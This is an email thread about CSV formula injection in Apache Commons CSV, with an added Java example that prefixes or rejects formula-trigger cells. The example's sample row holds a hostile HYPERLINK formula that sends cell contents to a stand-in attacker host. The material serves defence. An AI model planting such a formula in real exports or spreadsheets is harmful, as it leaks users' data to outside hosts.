Comments from Matt's partner in crime inline, below. -kevin
[This probably will bounce on the Commons Users List since I'm not
subscribed to that mailing list, but if you want it there, any of you who
is subscribed have my permission to forward it.]
On Thu, Nov 11, 2021 at 7:11 PM Matt Seil wrote:
The TLDR version: OWASP's recommendation is specifically to render code
intended to be executed as unexecutable. I'd suggest a fix be done at the
OWASP-Java-Encoder project and not here. I believe the suggestion of
providing this feature even at OWASP has near-zero value in the long run
because
> if actually quoting is enough and all should
> prefer xml based office formats anyway.
>
> I won't mind accepting a tester patch for such an option. Maybe even an
> unsafe-pass-default/quote-injection/reject-injection enum.
>
> Regards
> Bernd
> --
> http://bernd.eckenfels.net
From: sebb
Sent: Thursday, November 11, 2021 3:42:08 PM
To: Commons Users List
Cc: Gary Gregory ; ms...@acm.org
Subject: Re: [csv] Does the library provide means to circumvent CSV injection

On Thu, 11 Nov 2021 at 11:36, P. Ottlinger wrote:
>
> Hi guys,
>
> thanks for your reply.
>
> Maybe I'm misinterpreting something but I thought that it could be made
> possible to configure the CSVFormat object when writing the CSV data in a
> way that any data with possibly corrupting values (as shown on the OWASP
> page) will mask the whole contents of the cell.
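The masking P. Ottlinger asks for above, with the pass/quote/reject modes Bernd floats elsewhere in the thread, as an added example: this is not Commons CSV code, and the project offers no such option. It applies OWASP's CSV-injection guidance (a cell beginning with =, +, -, @, tab or carriage return is prefixed with a single quote so a spreadsheet reads it as text) at the application layer, before the value reaches the CSV writer. The class, method and enum names, the exemption for plain decimal numbers, the small stand-in writer, and the sample row are all assumptions of this example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example, not Commons CSV code: neutralise spreadsheet formula
 * injection in cell values before they are handed to a CSV writer such as
 * org.apache.commons.csv.CSVPrinter. The mode names follow Bernd's
 * suggested enum; the class and method names are illustrative.
 */
public final class CsvInjectionGuard {

    /** Modes as floated on the list: pass unchanged, neutralise, or refuse the cell. */
    public enum Mode { UNSAFE_PASS_DEFAULT, QUOTE_INJECTION, REJECT_INJECTION }

    /** Leading characters the OWASP CSV injection page lists as formula triggers. */
    private static final String TRIGGERS = "=+-@\t\r";

    /** Assumption of this example: a plain decimal such as "-5" is data, not a formula. */
    private static final Pattern PLAIN_NUMBER = Pattern.compile("-?\\d+(\\.\\d+)?");

    private final Mode mode;

    public CsvInjectionGuard(Mode mode) {
        this.mode = mode;
    }

    /** True when a spreadsheet would evaluate the cell instead of displaying it. */
    public static boolean looksLikeFormula(String cell) {
        if (cell == null || cell.isEmpty()) {
            return false;
        }
        if (TRIGGERS.indexOf(cell.charAt(0)) < 0) {
            return false;
        }
        return !PLAIN_NUMBER.matcher(cell).matches();
    }

    /** Returns the value to write; throws in REJECT_INJECTION mode. */
    public String guard(String cell) {
        if (!looksLikeFormula(cell)) {
            return cell;
        }
        switch (mode) {
            case QUOTE_INJECTION:
                // OWASP: a leading single quote makes the spreadsheet treat the cell as text.
                return "'" + cell;
            case REJECT_INJECTION:
                throw new IllegalArgumentException("cell starts with a formula trigger: " + cell);
            default:
                return cell;
        }
    }

    /**
     * Minimal RFC 4180 quoting so the example runs without the commons-csv jar.
     * In an application, pass the guarded values to CSVPrinter.printRecord(...),
     * which performs this quoting itself; do not quote twice.
     */
    static String toCsvLine(List<String> cells) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < cells.size(); i++) {
            if (i > 0) {
                sb.append(',');
            }
            String c = cells.get(i);
            boolean needsQuote = c.indexOf(',') >= 0 || c.indexOf('"') >= 0
                    || c.indexOf('\n') >= 0 || c.indexOf('\r') >= 0;
            sb.append(needsQuote ? "\"" + c.replace("\"", "\"\"") + "\"" : c);
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Constructed sample row: two hostile cells of the kind shown on the OWASP page,
        // plus a negative number that must survive untouched.
        List<String> row = List.of(
                "alice",
                "=HYPERLINK(\"http://attacker.example/?\"&A1,\"click\")",
                "-5",
                "@SUM(1+1)");

        CsvInjectionGuard quote = new CsvInjectionGuard(Mode.QUOTE_INJECTION);
        List<String> safe = new ArrayList<>();
        for (String cell : row) {
            safe.add(quote.guard(cell));
        }
        System.out.println(toCsvLine(safe));

        CsvInjectionGuard reject = new CsvInjectionGuard(Mode.REJECT_INJECTION);
        try {
            reject.guard(row.get(1));
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The guard only adds the prefix; the RFC 4180 quoting (wrapping in double quotes, doubling embedded quotes) is left to the CSV writer, which Commons CSV already does, so the two steps do not collide. The leading apostrophe is real data to any consumer that is not a spreadsheet, which is why it belongs on a spreadsheet-bound export rather than in the library's default output, and why rejecting such cells, or exporting an XML-based office format as Bernd suggests, may be the better choice for a given application.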
I agree with Matt. CSV is just a container; it doesn't know or care what
the concept of a "formula" is.
Gary
On Wed, Nov 10, 2021, 14:49 Matt Seil wrote:
>
> Hello,
>
> I'm Matt Seil, project co-lead for OWASP's ESAPI-Java-Legacy project.
>
> This email caught my attention. In short, I don't think you're going to
> get an affirmative answer because the potential use cases are too
> numerous. I'm totally speaking out of turn here; however, there may be